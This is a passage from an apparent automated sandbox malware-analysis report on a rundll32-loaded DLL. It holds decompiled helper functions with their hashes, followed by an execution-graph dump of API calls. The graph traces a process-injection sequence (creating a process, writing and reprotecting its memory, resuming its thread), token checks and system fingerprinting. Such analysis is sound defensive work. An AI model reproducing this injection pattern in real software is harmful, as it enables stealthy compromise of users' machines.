                                                                      						_t43 = _t35;
                                                                      						_t49 = _t32;
                                                                      						_t52 = _t47;
                                                                      						if(_t35 >= 8) {
                                                                      							if((_t32 & 0x00000001) != 0) {
                                                                      								_t49 = _t32 + 1;
                                                                      								_t52 = _t47 + 1;
                                                                      								 *_t32 =  *_t47 & 0x000000ff;
                                                                      								_t43 = _t35 - 1;
                                                                      							}
                                                                      							if((_t49 & 0x00000002) != 0) {
                                                                      								_t55 =  *_t52 & 0x0000ffff;
                                                                      								_t49 = _t49 + 2;
                                                                      								_t52 = _t52 + 2;
                                                                      								_t43 = _t43 - 2;
                                                                      								 *(_t49 - 2) = _t55;
                                                                      							}
                                                                      							if((_t49 & 0x00000004) != 0) {
                                                                      								_t56 =  *_t52;
                                                                      								_t49 = _t49 + 4;
                                                                      								_t52 = _t52 + 4;
                                                                      								_t43 = _t43 - 4;
                                                                      								 *(_t49 - 4) = _t56;
                                                                      							}
                                                                      						}
                                                                      						_t34 = memcpy(_t49, _t52, _t43);
                                                                      						_t57 =  &(_t57[3]);
                                                                      						_t32 = _t34 + _a8;
                                                                      						_t47 = _t47 + _a16;
                                                                      						_t11 =  &_a24;
                                                                      						 *_t11 = _a24 - 1;
                                                                      					} while ( *_t11 != 0);
                                                                      					goto L12;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      Strings
                                                                      • Assertion %s failed at %s:%d, xrefs: 100225D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: abortmv_log
                                                                      • String ID: Assertion %s failed at %s:%d
                                                                      • API String ID: 2075109169-2766368343
                                                                      • Opcode ID: 96ccb67a9ced400229960c739ff5e4974aafcccf3633072cb66a9d878579e67e
                                                                      • Instruction ID: 11814923a7bf7540ef128da13c98316d9c3b81b6007f7c64051ac5900c87ea26
                                                                      • Opcode Fuzzy Hash: 96ccb67a9ced400229960c739ff5e4974aafcccf3633072cb66a9d878579e67e
                                                                      • Instruction Fuzzy Hash: 5C318D75A08B219BC708CF90E5A452EFBF1EFC1750FD1841CE98957200D77A9984CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_image_get_linesize.F086 ref: 10022203
                                                                        • Part of subcall function 10021480: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496
                                                                      Strings
                                                                      • Picture size %ux%u is invalid, xrefs: 1002228D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_image_get_linesizemv_pix_fmt_desc_get
                                                                      • String ID: Picture size %ux%u is invalid
                                                                      • API String ID: 645864070-1963597007
                                                                      • Opcode ID: 0946b3bcac33ba6fca7acdb6ca24e0fe7ad52919dc498f119e2a3142e05806b9
                                                                      • Instruction ID: c32bc821c07fb99167277532678e70ae68b76ab36c526d85f24e74df5a32105a
                                                                      • Opcode Fuzzy Hash: 0946b3bcac33ba6fca7acdb6ca24e0fe7ad52919dc498f119e2a3142e05806b9
                                                                      • Instruction Fuzzy Hash: C7215E75A083559FC704CF69C48020EFBE1FBC8710F958A2EF9A897350D7B5E9048B46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 21%
                                                                      			E1002E43C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                      				char _v16;
                                                                      				intOrPtr _v44;
                                                                      				char* _v48;
                                                                      				char* _v52;
                                                                      				intOrPtr _v56;
                                                                      				void* _t18;
                                                                      				intOrPtr _t31;
                                                                      				intOrPtr* _t34;
                                                                      
                                                                      				 *_t34 =  &_v16;
                                                                      				_t18 = L1002B8B0(_a4, _a12, _a8);
                                                                      				if(_t18 == 0) {
                                                                      					L6:
                                                                      					return 0xabafb008;
                                                                      				}
                                                                      				_t31 = _v16;
                                                                      				if(_t31 == 0) {
                                                                      					goto L6;
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t18 + 0xc)) != 0xd) {
                                                                      					_v52 = "The value for option \'%s\' is not a %s format.\n";
                                                                      					_v56 = 0x10;
                                                                      					_v44 = _a8;
                                                                      					_v48 = "sample";
                                                                      					 *_t34 = _a4;
                                                                      					E10026560();
                                                                      					return 0xffffffea;
                                                                      				}
                                                                      				 *_a16 =  *((intOrPtr*)(_t31 +  *((intOrPtr*)(_t18 + 8))));
                                                                      				return 0;
                                                                      			}












                                                                      APIs
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908
                                                                      • mv_log.F086 ref: 1002E4A9
                                                                      Strings
                                                                      • sample, xrefs: 1002E499
                                                                      • The value for option '%s' is not a %s format., xrefs: 1002E483
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strcmp$mv_log
                                                                      • String ID: The value for option '%s' is not a %s format.$sample
                                                                      • API String ID: 2835281190-3983800382
                                                                      • Opcode ID: f5f5e1db834bc02c8d1f8d4e6b274bacd7e5ca34d8842da282809734814b002e
                                                                      • Instruction ID: 24d4803273969bdf5ac517b635905fb994549115ec294322d3153323df2d4d09
                                                                      • Opcode Fuzzy Hash: f5f5e1db834bc02c8d1f8d4e6b274bacd7e5ca34d8842da282809734814b002e
                                                                      • Instruction Fuzzy Hash: C001A2786487818FC700DF29D08091AB7F2FB89350F95892DE99887360D739EC418B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908
                                                                      • mv_channel_layout_copy.F086 ref: 1002E58D
                                                                      • mv_log.F086 ref: 1002E5C1
                                                                      Strings
                                                                      • The value for option '%s' is not a channel layout., xrefs: 1002E5A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strcmp$mv_channel_layout_copymv_log
                                                                      • String ID: The value for option '%s' is not a channel layout.
                                                                      • API String ID: 3662905369-3477801521
                                                                      • Opcode ID: a0beb69c1654b65415c70491f5d146282333a6159417d5f317bf65ca5f97ae25
                                                                      • Instruction ID: 8c388eaf2947d92ae89fe11a4375cf88f0abf7b9dee68859406d060f25dfbf9e
                                                                      • Opcode Fuzzy Hash: a0beb69c1654b65415c70491f5d146282333a6159417d5f317bf65ca5f97ae25
                                                                      • Instruction Fuzzy Hash: 6201DC78A19B419FC784DF28D080A1AB7E1FF88354F81882EF89983311E634EC408B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 21%
                                                                      			E1002E3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                      				char _v16;
                                                                      				intOrPtr _v44;
                                                                      				intOrPtr _v48;
                                                                      				char* _v52;
                                                                      				intOrPtr _v56;
                                                                      				void* _t18;
                                                                      				intOrPtr _t31;
                                                                      				intOrPtr* _t34;
                                                                      
                                                                      				 *_t34 =  &_v16;
                                                                      				_t18 = L1002B8B0(_a4, _a12, _a8);
                                                                      				if(_t18 == 0) {
                                                                      					L6:
                                                                      					return 0xabafb008;
                                                                      				}
                                                                      				_t31 = _v16;
                                                                      				if(_t31 == 0) {
                                                                      					goto L6;
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t18 + 0xc)) != 0xc) {
                                                                      					_v52 = "The value for option \'%s\' is not a %s format.\n";
                                                                      					_v56 = 0x10;
                                                                      					_v44 = _a8;
                                                                      					_v48 = 0x100b78a0;
                                                                      					 *_t34 = _a4;
                                                                      					E10026560();
                                                                      					return 0xffffffea;
                                                                      				}
                                                                      				 *_a16 =  *((intOrPtr*)(_t31 +  *((intOrPtr*)(_t18 + 8))));
                                                                      				return 0;
                                                                      			}












                                                                      APIs
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908
                                                                      • mv_log.F086 ref: 1002E429
                                                                      Strings
                                                                      • pixel, xrefs: 1002E419
                                                                      • The value for option '%s' is not a %s format., xrefs: 1002E403
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strcmp$mv_log
                                                                      • String ID: The value for option '%s' is not a %s format.$pixel
                                                                      • API String ID: 2835281190-1801304947
                                                                      • Opcode ID: 74d3c326208ced39a7e621591af8db260eb8e46ed0a12fe7f96116a714d8054d
                                                                      • Instruction ID: 2db19661b65d9fea08d7a077c7d71974f084c1656edb1fac65c3c7ca3a026336
                                                                      • Opcode Fuzzy Hash: 74d3c326208ced39a7e621591af8db260eb8e46ed0a12fe7f96116a714d8054d
                                                                      • Instruction Fuzzy Hash: F501AE78A487818FC300DF29D094A1ABBF1FB89350F95896EE99887320E735DD418B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprint_init_for_buffermv_bprintf
                                                                      • String ID: none
                                                                      • API String ID: 2490314137-2140143823
                                                                      • Opcode ID: fb99da9c4718ad6228832967d969a5fa7994f6f45e19e41f4cd0f504848537d0
                                                                      • Instruction ID: a25a21bf0bbbab6eb8dd7b885bea08568b6db38ddaeda7311d16c5a577b3c9a6
                                                                      • Opcode Fuzzy Hash: fb99da9c4718ad6228832967d969a5fa7994f6f45e19e41f4cd0f504848537d0
                                                                      • Instruction Fuzzy Hash: 910186B4904B568BD720DF24D880B9BB3E4FFC4384F52492DEA9853245D330BD858B93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E10012408(char* __ebx, intOrPtr __esi, intOrPtr _a4, char* _a8, intOrPtr _a12, intOrPtr _a144, intOrPtr _a148) {
                                                                      				char* _t14;
                                                                      				intOrPtr _t18;
                                                                      				intOrPtr _t21;
                                                                      				intOrPtr* _t22;
                                                                      
                                                                      				_t19 = __esi;
                                                                      				_t14 = __ebx;
                                                                      				_a12 = __esi;
                                                                      				_a4 = 0x20;
                                                                      				 *_t22 = __ebx;
                                                                      				_a8 = ".%06dZ";
                                                                      				L100067F0(".%06dZ", __ebx, _t18, __esi);
                                                                      				_a8 = _t14;
                                                                      				_a12 = 0;
                                                                      				_a4 = _a148;
                                                                      				 *_t22 = _a144;
                                                                      				return E10011210(_t14, _t18, _t19, _t21);
                                                                      			}








                                                                      APIs
                                                                      • mv_strlcatf.F086 ref: 10012429
                                                                        • Part of subcall function 100067F0: strlen.MSVCRT ref: 1000680A
                                                                      • mv_dict_set.F086 ref: 1001244D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_dict_setmv_strlcatfstrlen
                                                                      • String ID: .%06dZ
                                                                      • API String ID: 1014950348-3752268379
                                                                      • Opcode ID: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
                                                                      • Instruction ID: 95eb8ff42823485582616919598dcae06947ee25e4005e9b3a20f874dc0564a5
                                                                      • Opcode Fuzzy Hash: 112283aaecfa77c8f98fb54c5a0ced329aef4e4efddc2c3c9d6336029b181351
                                                                      • Instruction Fuzzy Hash: DAE04EB5908740AFD714DF29E48175ABBE0FB88354F51C82EB49C97306D63898418B46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:6.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:5.9%
                                                                      Total number of Nodes:1432
                                                                      Total number of Limit Nodes:7
11736->11739 11738 41b913b 2 API calls 11737->11738 11738->11739 11739->11618 11741 41b911f RtlAllocateHeap 11740->11741 11742 41b29e4 11741->11742 11743 41b2a3f 11742->11743 11744 41b911f RtlAllocateHeap 11742->11744 11743->11623 11745 41b29f5 11744->11745 11745->11743 11746 41b962b 2 API calls 11745->11746 11747 41b2a1b 11746->11747 11748 41b2a39 GetLastError 11747->11748 11749 41b2a43 11747->11749 11748->11743 11749->11623 11751 41b90ca 2 API calls 11750->11751 11752 41b1308 SetCurrentDirectoryA 11751->11752 11753 41b9d4c 2 API calls 11752->11753 11754 41b131c 11753->11754 12140 41ba9fc 11754->12140 11757 41b1326 11757->11627 11759 41b1330 12160 41b2748 11759->12160 11764 41b1393 12195 41b1192 11764->12195 11765 41b1344 11767 41b1349 11765->11767 11768 41b1398 11765->11768 11770 41b13b4 11767->11770 11773 41bbfab 7 API calls 11767->11773 11769 41b1391 11768->11769 11768->11770 12220 41c1358 11768->12220 12241 41b1178 11769->12241 11770->11627 11774 41b1369 11773->11774 12172 41b2382 11774->12172 11788 41b90ca 11778->11788 11781 41b94bc LoadLibraryA 11783 41b94c3 11781->11783 11782 41b94b4 GetModuleHandleA 11782->11783 11784 41b94d1 11783->11784 11791 41b9446 11783->11791 11796 41b9d4c 11784->11796 11800 41b9bf7 11788->11800 11792 41b911f RtlAllocateHeap 11791->11792 11794 41b9458 11792->11794 11793 41b9487 11793->11784 11794->11793 11806 41b92f0 11794->11806 11797 41b9d5a 11796->11797 11798 41b15e8 11796->11798 11799 41b913b 2 API calls 11797->11799 11798->11635 11799->11798 11801 41b9c21 GetNumberFormatA 11800->11801 11802 41b9c0c 11800->11802 11805 41b90e5 11801->11805 11802->11801 11803 41b9c4f 11802->11803 11804 41b911f RtlAllocateHeap 11803->11804 11804->11805 11805->11781 11805->11782 11807 41b9364 11806->11807 11808 41b9309 11806->11808 11807->11794 11808->11807 11809 41b93bc LoadLibraryA 11808->11809 11809->11807 11810 41b93ca GetProcAddress 11809->11810 11810->11807 11811 41b93d6 11810->11811 11811->11807 11813 41b92ab memset 11812->11813 11814 41b9175 
HeapFree 11812->11814 11813->11814 11814->11657 11816 41bdc4a 11815->11816 11817 41bdc4e 11816->11817 11914 41bdc1c 11816->11914 11817->11668 11820 41bdc73 FindCloseChangeNotification 11821 41bdc5f 11820->11821 11821->11668 11926 41bdb58 GetCurrentThread OpenThreadToken 11822->11926 11825 41bdd39 11825->11669 11826 41bdbaf 6 API calls 11830 41bdcb7 FindCloseChangeNotification 11826->11830 11828 41bdd2f 11829 41b913b 2 API calls 11828->11829 11829->11825 11830->11825 11830->11828 11833 41be5c5 11831->11833 11832 41bbc19 11835 41be56b 11832->11835 11833->11832 11931 41b9787 11833->11931 11836 41be582 11835->11836 11837 41be5a2 11836->11837 11838 41b9787 RtlAllocateHeap 11836->11838 11837->11674 11839 41be58f 11838->11839 11839->11674 11841 41bba6b 11840->11841 11842 41bba7c 11841->11842 11935 41bb947 GetCommandLineW CommandLineToArgvW 11841->11935 11842->11681 11944 41bd04d 11844->11944 11846 41bbcd6 11847 41bcf1d 11846->11847 11848 41bcf38 11847->11848 11849 41b90ca 2 API calls 11848->11849 11850 41bcf42 11849->11850 11958 41c4b56 11850->11958 11852 41bcf8d 11853 41b9d4c 2 API calls 11852->11853 11854 41bbcec 11853->11854 11857 41b98a9 11854->11857 11855 41bcf57 11855->11852 11856 41c4b56 2 API calls 11855->11856 11856->11855 11858 41b98b0 11857->11858 11859 41b98b5 MultiByteToWideChar 11857->11859 11858->11687 11860 41b98c9 11859->11860 11860->11687 11862 41b90ca 2 API calls 11861->11862 11863 41bd161 11862->11863 11864 41b90ca 2 API calls 11863->11864 11866 41bd172 11864->11866 11865 41bbd27 11874 41bde00 11865->11874 11866->11865 11867 41c4b56 2 API calls 11866->11867 11868 41bd1cb 11866->11868 11867->11866 11869 41c4b56 2 API calls 11868->11869 11870 41bd1f6 11868->11870 11869->11868 11871 41b9d4c 2 API calls 11870->11871 11872 41bd203 11871->11872 11873 41b9d4c 2 API calls 11872->11873 11873->11865 11875 41bde18 11874->11875 11876 41bbd39 11875->11876 11877 41bdbaf 6 API calls 11875->11877 11876->11692 11879 41bde30 11877->11879 11878 41b913b 2 API calls 
11878->11876 11879->11876 11879->11878 11881 41bb86f GetCurrentProcess IsWow64Process 11880->11881 11882 41bb880 11880->11882 11881->11882 11883 41bb883 11882->11883 11884 41bb88d 11883->11884 11885 41bb892 GetSystemInfo 11883->11885 11884->11697 11885->11697 11963 41b9c9b 11886->11963 11890 41bbecc 11889->11890 11891 41c4a07 11889->11891 11893 41b962b 11890->11893 11891->11890 11892 41c4b56 2 API calls 11891->11892 11892->11891 11969 41b95b3 11893->11969 11896 41bb501 11898 41bb7e6 11896->11898 11897 41b90ca 2 API calls 11897->11898 11898->11897 11899 41bb819 11898->11899 11902 41b9d4c 2 API calls 11898->11902 11987 41b99fd 11898->11987 11975 41bc71c CreateToolhelp32Snapshot 11899->11975 11902->11898 11903 41bb835 11905 41bb852 11903->11905 11993 41b9af6 11903->11993 11905->11665 11907 41bbb38 11906->11907 11908 41bbb48 11907->11908 12002 41bba84 GetCommandLineW CommandLineToArgvW 11907->12002 11908->11681 11911 41b92a2 memset 11910->11911 11912 41bc0a2 _vsnwprintf 11911->11912 11913 41bc0bf 11912->11913 11913->11703 11917 41bdbaf GetTokenInformation 11914->11917 11918 41bdbd1 GetLastError 11917->11918 11920 41bdbee 11917->11920 11919 41bdbdc 11918->11919 11918->11920 11921 41b911f RtlAllocateHeap 11919->11921 11920->11820 11920->11821 11922 41bdbe4 11921->11922 11922->11920 11923 41bdbf2 GetTokenInformation 11922->11923 11923->11920 11924 41bdc07 11923->11924 11925 41b913b 2 API calls 11924->11925 11925->11920 11927 41bdba5 11926->11927 11928 41bdb79 GetLastError 11926->11928 11927->11825 11927->11826 11928->11927 11929 41bdb86 OpenProcessToken 11928->11929 11929->11927 11932 41b9790 11931->11932 11934 41b97a2 11931->11934 11933 41b911f RtlAllocateHeap 11932->11933 11933->11934 11934->11832 11940 41bb97d 11935->11940 11943 41bba35 11935->11943 11936 41bb9d3 11937 41bb9f5 GetCurrentDirectoryW 11936->11937 11936->11943 11939 41b9924 2 API calls 11937->11939 11938 41bb9a1 lstrlenW 11938->11940 11941 41bba1c 11939->11941 11940->11936 11940->11938 11942 41b913b 2 API 
calls 11941->11942 11942->11943 11943->11842 11945 41b92a2 memset 11944->11945 11946 41bd06f 11945->11946 11947 41b90ea 2 API calls 11946->11947 11948 41bd0a5 GetVolumeInformationW 11947->11948 11949 41b9d66 2 API calls 11948->11949 11950 41bd0da 11949->11950 11951 41bc08e 2 API calls 11950->11951 11952 41bd0fb lstrcatW 11951->11952 11956 41bce3e 11952->11956 11955 41bd121 11955->11846 11957 41bce46 CharUpperBuffW 11956->11957 11957->11955 11959 41c4b66 11958->11959 11960 41c4b99 lstrlenW 11959->11960 11961 41c4bb6 _ftol2_sse 11960->11961 11961->11855 11964 41b9cd6 GetNumberFormatA 11963->11964 11965 41b9cb2 11963->11965 11966 41b9cf6 11964->11966 11965->11964 11966->11966 11967 41b911f RtlAllocateHeap 11966->11967 11968 41b9105 11967->11968 11968->11700 11970 41b95c3 11969->11970 11970->11970 11971 41c4b56 2 API calls 11970->11971 11972 41b95de 11971->11972 11973 41c4b56 2 API calls 11972->11973 11974 41b9612 11972->11974 11973->11972 11974->11896 11976 41bc74a 11975->11976 11977 41bc775 11975->11977 11978 41b92a2 memset 11976->11978 11977->11903 11979 41bc75c Process32First 11978->11979 11979->11977 11980 41bc783 11979->11980 11981 41b911f RtlAllocateHeap 11980->11981 11982 41bc78a 11981->11982 11983 41b913b 2 API calls 11982->11983 11984 41bc7a9 11983->11984 11985 41bc7d0 FindCloseChangeNotification 11984->11985 11999 41bb48b 11984->11999 11985->11977 11989 41b9a11 11987->11989 11988 41b911f RtlAllocateHeap 11992 41b9a69 11988->11992 11989->11988 11990 41b9ae0 11990->11898 11991 41b911f RtlAllocateHeap 11991->11992 11992->11990 11992->11991 11994 41b9b42 11993->11994 11996 41b9b07 11993->11996 11994->11903 11995 41b9b39 11997 41b913b 2 API calls 11995->11997 11996->11994 11996->11995 11998 41b913b 2 API calls 11996->11998 11997->11994 11998->11996 12000 41bb4ed Sleep 11999->12000 12001 41bb49c 11999->12001 12000->11984 12001->12000 12003 41bbab0 12002->12003 12008 41bbb05 12002->12008 12004 41bbac5 GetCurrentDirectoryW 12003->12004 12003->12008 12005 41b9924 2 
API calls 12004->12005 12006 41bbaed 12005->12006 12007 41b913b 2 API calls 12006->12007 12007->12008 12008->11908 12010 41ba55f 12009->12010 12011 41b911f RtlAllocateHeap 12010->12011 12015 41ba5f6 12011->12015 12012 41ba653 12012->11717 12012->11725 12013 41b90ea 2 API calls 12013->12015 12014 41b9d66 2 API calls 12014->12015 12015->12012 12015->12013 12015->12014 12016 41b9787 RtlAllocateHeap 12015->12016 12016->12015 12018 41b92a2 memset 12017->12018 12019 41bcaaa 12018->12019 12020 41b92a2 memset 12019->12020 12021 41bcab7 CreateProcessW 12020->12021 12021->11725 12023 41ba850 12022->12023 12024 41ba844 12022->12024 12058 41ba412 12023->12058 12078 41ba222 12024->12078 12030 41b92a2 memset 12031 41ba88a GetThreadContext 12030->12031 12033 41ba8b0 12031->12033 12036 41ba921 12031->12036 12032 41ba928 12032->11725 12033->12032 12034 41ba8e3 NtProtectVirtualMemory NtWriteVirtualMemory 12033->12034 12035 41ba92f NtProtectVirtualMemory 12034->12035 12034->12036 12035->12036 12101 41ba356 12036->12101 12123 41bbfab 12037->12123 12040 41ba98d GetLastError ResumeThread 12042 41ba9af FindCloseChangeNotification 12040->12042 12041 41ba9c2 12041->11725 12042->12041 12045 41b90ea 2 API calls 12044->12045 12046 41be16b 12045->12046 12047 41b90ea 2 API calls 12046->12047 12048 41be17c 12047->12048 12049 41bc08e 2 API calls 12048->12049 12050 41be1b4 12049->12050 12051 41b9924 2 API calls 12050->12051 12052 41be1cf 12051->12052 12053 41be205 12052->12053 12057 41be217 12052->12057 12055 41b9d66 2 API calls 12053->12055 12054 41b9d66 2 API calls 12056 41be20e 12054->12056 12055->12056 12056->11725 12057->12054 12059 41ba430 NtAllocateVirtualMemory 12058->12059 12060 41ba4a2 12058->12060 12059->12060 12061 41ba453 12059->12061 12060->12030 12060->12036 12106 41b918a 12061->12106 12063 41ba463 12063->12060 12109 41bca0f NtAllocateVirtualMemory 12063->12109 12066 41ba4ab 12068 41b913b 2 API calls 12066->12068 12067 41ba49d 12069 41b913b 2 API calls 12067->12069 12070 41ba4b0 
12068->12070 12069->12060 12071 41b918a RtlAllocateHeap 12070->12071 12072 41ba4d9 12071->12072 12072->12060 12073 41ba4ee NtWriteVirtualMemory 12072->12073 12073->12060 12074 41ba51d 12073->12074 12115 41c43f4 12074->12115 12077 41b913b 2 API calls 12077->12060 12079 41b90ea 2 API calls 12078->12079 12080 41ba23a 12079->12080 12081 41bc08e 2 API calls 12080->12081 12082 41ba271 12081->12082 12083 41b90ea 2 API calls 12082->12083 12084 41ba290 12083->12084 12085 41b9924 2 API calls 12084->12085 12086 41ba2aa 12085->12086 12087 41b9d66 2 API calls 12086->12087 12088 41ba2b8 12087->12088 12089 41b9924 2 API calls 12088->12089 12090 41ba2db LoadLibraryW 12089->12090 12092 41ba30c 12090->12092 12093 41ba2fe 12090->12093 12095 41b913b 2 API calls 12092->12095 12094 41b9446 3 API calls 12093->12094 12094->12092 12096 41ba31a 12095->12096 12097 41b92a2 memset 12096->12097 12098 41ba32d 12097->12098 12099 41ba33f 12098->12099 12100 41b913b 2 API calls 12098->12100 12099->12023 12100->12099 12102 41ba35f FreeLibrary 12101->12102 12103 41ba36d 12101->12103 12102->12103 12104 41ba38e 12103->12104 12105 41b913b 2 API calls 12103->12105 12104->12032 12105->12104 12107 41b911f RtlAllocateHeap 12106->12107 12108 41b919b 12107->12108 12108->12063 12110 41ba48a 12109->12110 12111 41bca44 NtWriteVirtualMemory 12109->12111 12110->12066 12110->12067 12112 41bca57 NtProtectVirtualMemory 12111->12112 12113 41bca76 12111->12113 12112->12110 12112->12113 12113->12110 12114 41bca7c NtFreeVirtualMemory 12113->12114 12114->12110 12116 41c440c NtProtectVirtualMemory 12115->12116 12122 41ba52d 12115->12122 12118 41c448b 12116->12118 12116->12122 12119 41b92a2 memset 12118->12119 12118->12122 12120 41c44c5 12119->12120 12121 41c4600 NtProtectVirtualMemory 12120->12121 12121->12122 12122->12077 12124 41bbfc4 12123->12124 12127 41bbef8 12124->12127 12128 41c49fc 2 API calls 12127->12128 12129 41bbf10 12128->12129 12130 41b90ca 2 API calls 12129->12130 12131 41bbf3a 12130->12131 12136 41bc04f 
12131->12136 12133 41bbf98 12134 41b9d4c 2 API calls 12133->12134 12135 41ba973 12134->12135 12135->12040 12135->12041 12137 41b92a2 memset 12136->12137 12138 41bc063 _vsnprintf 12137->12138 12139 41bc07d 12138->12139 12139->12133 12245 41baa27 12140->12245 12143 41c1414 12144 41b911f RtlAllocateHeap 12143->12144 12145 41c141f 12144->12145 12146 41c1429 12145->12146 12306 41be75d 12145->12306 12146->11759 12149 41b90ca 2 API calls 12151 41c1463 12149->12151 12150 41c14a5 12150->11759 12312 41b9743 12151->12312 12155 41c1358 14 API calls 12157 41c14a1 12155->12157 12156 41c146e 12158 41b9d4c 2 API calls 12156->12158 12157->11759 12159 41c1480 12158->12159 12159->12150 12316 41be91f 12159->12316 12324 41bade7 12160->12324 12163 41b140b 12164 41bbfab 7 API calls 12163->12164 12165 41b1428 12164->12165 12166 41b2382 10 API calls 12165->12166 12168 41b133a 12165->12168 12167 41b1462 12166->12167 12167->12168 12353 41badcd 12167->12353 12168->11764 12168->11765 12171 41b1474 lstrcmpiW 12171->12168 12173 41bbfab 7 API calls 12172->12173 12174 41b239b 12173->12174 12175 41b23a8 12174->12175 12176 41b98d1 2 API calls 12174->12176 12177 41b23cb 12176->12177 12357 41be88a 12177->12357 12179 41b23db 12180 41b23ff 12179->12180 12183 41be88a 2 API calls 12179->12183 12181 41b913b 2 API calls 12180->12181 12182 41b1387 12181->12182 12184 41b129c 12182->12184 12183->12180 12185 41badcd 4 API calls 12184->12185 12186 41b12a6 12185->12186 12187 41b12af 12186->12187 12188 41b12b4 lstrcmpiW 12186->12188 12187->11769 12189 41b12ca 12188->12189 12190 41b12e6 12188->12190 12362 41baec5 12189->12362 12192 41b913b 2 API calls 12190->12192 12192->12187 12196 41b911f RtlAllocateHeap 12195->12196 12197 41b11a4 12196->12197 12198 41b11e8 12197->12198 12199 41b11b7 GetDriveTypeW 12197->12199 12410 41b2885 12198->12410 12199->12198 12202 41b90ea 2 API calls 12203 41b1211 12202->12203 12204 41b9924 2 API calls 